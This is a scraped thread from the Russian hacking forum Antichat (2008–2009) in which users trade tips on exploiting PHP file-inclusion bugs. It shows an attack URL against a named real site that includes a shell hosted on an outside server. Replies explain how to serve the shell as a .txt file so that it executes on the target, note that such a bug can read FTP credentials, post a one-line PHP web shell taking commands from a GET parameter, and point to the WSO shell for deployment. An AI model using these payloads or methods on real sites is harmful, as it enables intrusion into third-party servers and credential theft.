Antichat снова доступен.
Форум Antichat (Античат) возвращается и снова открыт для пользователей.
Здесь обсуждаются безопасность, программирование, технологии и многое другое.
Сообщество снова собирается вместе.
Новый адрес: forum.antichat.xyz
 |
|

12.11.2008, 15:06
|
|
Познающий
Регистрация: 20.05.2008
Сообщений: 78
Провел на форуме: 555326
Репутация:
47
|
|
Сообщение от Solide Snake
ммм... спасибо 
|
|
|

20.02.2009, 23:13
|
|
Познающий
Регистрация: 29.08.2008
Сообщений: 86
Провел на форуме: 789539
Репутация:
53
|
|
А что делать если стоит фильтрация на \ : . - вообщем на "плохие" символы?
|
|
|

13.10.2009, 10:58
|
|
Новичок
Регистрация: 06.10.2009
Сообщений: 3
Провел на форуме: 76901
Репутация:
0
|
|
Plizzz help
Такая фигня, http://www.prodisney.ru/index.php?page=http://nabstre.tu2.ru/shell.php но показывает дерикторию моего сайта а не этого что делать???
|
|
|

16.10.2009, 10:22
|
|
Новичок
Регистрация: 25.01.2008
Сообщений: 5
Провел на форуме: 9419
Репутация:
2
|
|
Во первых скрипт на твоем сайте должен быть не исполняемым, то есть txt файл к примеру.
Либо вообще без расширения, то есть так:
index.php?page=http://nabstre.tu2.ru/shell.txt?
Потому что если файл исполняемый, то он исполнятся будет на твоем сервере, а на выходе будет уже результат. Поэтому выводится содержание директории на твоем сервере.
Во вторых конкретно на этом сайте бага не работает, скрипт не инклюдит файлы, а выводит их содержание.
Так что облом.
Последний раз редактировалось Rezak; 16.10.2009 в 10:27..
|
|
|

06.11.2009, 21:49
|
|
Новичок
Регистрация: 27.07.2009
Сообщений: 5
Провел на форуме: 11873
Репутация:
0
|
|
а такой вопросик почему часто бывает то что шел не запускается а просто отображается код шелла.
|
|
|

06.11.2009, 21:56
|
|
Динозавр
Регистрация: 10.01.2008
Сообщений: 2,841
Провел на форуме: 9220514
Репутация:
3338
|
|
потому что риадер, а не LFI, нет инклуда, есть читалка
PS: Но тоже очень неплохо, т.к. можно прочитать важную системную информацию, например фтп-логин/пасс, что будет покруче любого шелла
|
|
|

06.11.2009, 21:57
|
|
Постоянный
Регистрация: 20.12.2007
Сообщений: 334
Провел на форуме: 1934122
Репутация:
118
|
|
Бага в функциях fopen(), file(), file_get_contents() и подобных функциях, которые не способны интерпретировать код.
|
|
|

11.11.2009, 00:21
|
|
Постоянный
Регистрация: 06.11.2006
Сообщений: 865
Провел на форуме: 1977708
Репутация:
208
|
|
а можете дать адрес рабочего шелла? а то та, которая в статье - уже дохлый.
(или код, чтоб запись на свой хост)
|
|
|

11.11.2009, 00:49
|
|
Участник форума
Регистрация: 18.07.2009
Сообщений: 272
Провел на форуме: 2083691
Репутация:
330
|
|
(или код, чтоб запись на свой хост)
<?php system($_GET[cmd]); ?>
Если нужен продвинутый шелл - топай топай в раздел "Избраное" и качай WSO
|
|
|

11.11.2009, 01:10
|
|
Постоянный
Регистрация: 06.11.2006
Сообщений: 865
Провел на форуме: 1977708
Репутация:
208
|
|
Спасибо, нашел и скачал.
а не подскажете как его настроить? просто все это залить в сервер и "вызывать" по адресу: www.mysite.ru/wso2.php ?
|
|
|
|
 |
|
|
Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
|
|
|
|